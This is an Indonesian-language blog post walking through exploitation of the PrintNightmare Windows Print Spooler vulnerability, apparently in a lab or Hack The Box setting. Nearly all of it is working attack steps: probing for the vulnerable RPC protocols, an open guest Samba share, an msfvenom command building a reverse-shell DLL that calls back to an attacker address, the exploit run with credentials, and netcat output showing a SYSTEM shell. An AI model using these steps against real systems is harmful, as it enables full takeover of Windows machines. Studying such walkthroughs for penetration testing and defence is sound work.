Post

[CVE-2021-1675 / CVE-2021-34527] PrintNightmare

Posted Updated
By Nairpaa 1 min read

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) adalah kerentanan yang terjadi pada layanan Microsoft Windows Print Spooler. Kerentanan memungkinkan penyerang untuk mendapatkan kendali penuh atas sistem yang terdampak.

Tahapan eksploitasi

Step 1: Cek potensi kerentanan secara remote

1
2
3
4

➜ rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Step 2: Siapkan environment

1
2
3
4
5

➜ heyho python3 -m venv venv 
➜ heyho source venv/bin/activate
➜ /tmp venv:(heyho) cd /opt/windows/PrintNightmare/CVE-2021-1675/impacket
➜ impacket git:(master) venv:(heyho) pip3 install -r requirements.txt
➜ impacket git:(master) venv:(heyho) python3 setup.py install

Download versi script yang sudah di update dan simpan sebagai printnightmare.py.

Step 3: Cek koneksi

1
2
3
4

# cek apakah ada koneksi yang masuk
➜ CVE-2021-1675 git:(main?) venv:(heyho) python3 printnightmare.py 'lemin:bandung@10.1.2.134' PleaseBlockMe '\\10.18.200.11\test\tost'

➜ nc -lvnp 445

Step 4: Konfigurasi server SMB

/etc/samba/smb.conf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/heyho/
    guest ok = yes
    read only = no
    browsable = yes
    force user = kali

Restart server SMB:

1

sudo systemctl restart smbd

Reverse shell

Generate .dll reverse shell:

1

➜ heyho msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.200.11 LPORT=1338 -f dll -o shell.dll

Exploit PrintNightmare:

1

➜ CVE-2021-1675 git:(main?) venv:(heyho) python3 printnightmare.py 'lemin:bandung@10.1.2.134' PleaseBlockMe '\\10.18.200.11\smb\shell.dll'

1
2
3
4
5
6
7
8
9

➜ nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.18.200.11] from (UNKNOWN) [10.1.2.134] 50097
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Referensi

  • https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
  • https://github.com/cube0x0/CVE-2021-1675
  • Driver HTB by Ippsec
  • Atom HTB by Ippsec
  • https://winpoin.com/cara-cegah-bug-exploit-printnightmare-di-windows/
  • https://www.redscan.com/news/printnightmare-security-advisory/
Privilege Escalation, Windows Privilege Escalation
windows privilege escalation
This post is licensed under CC BY 4.0 by the author.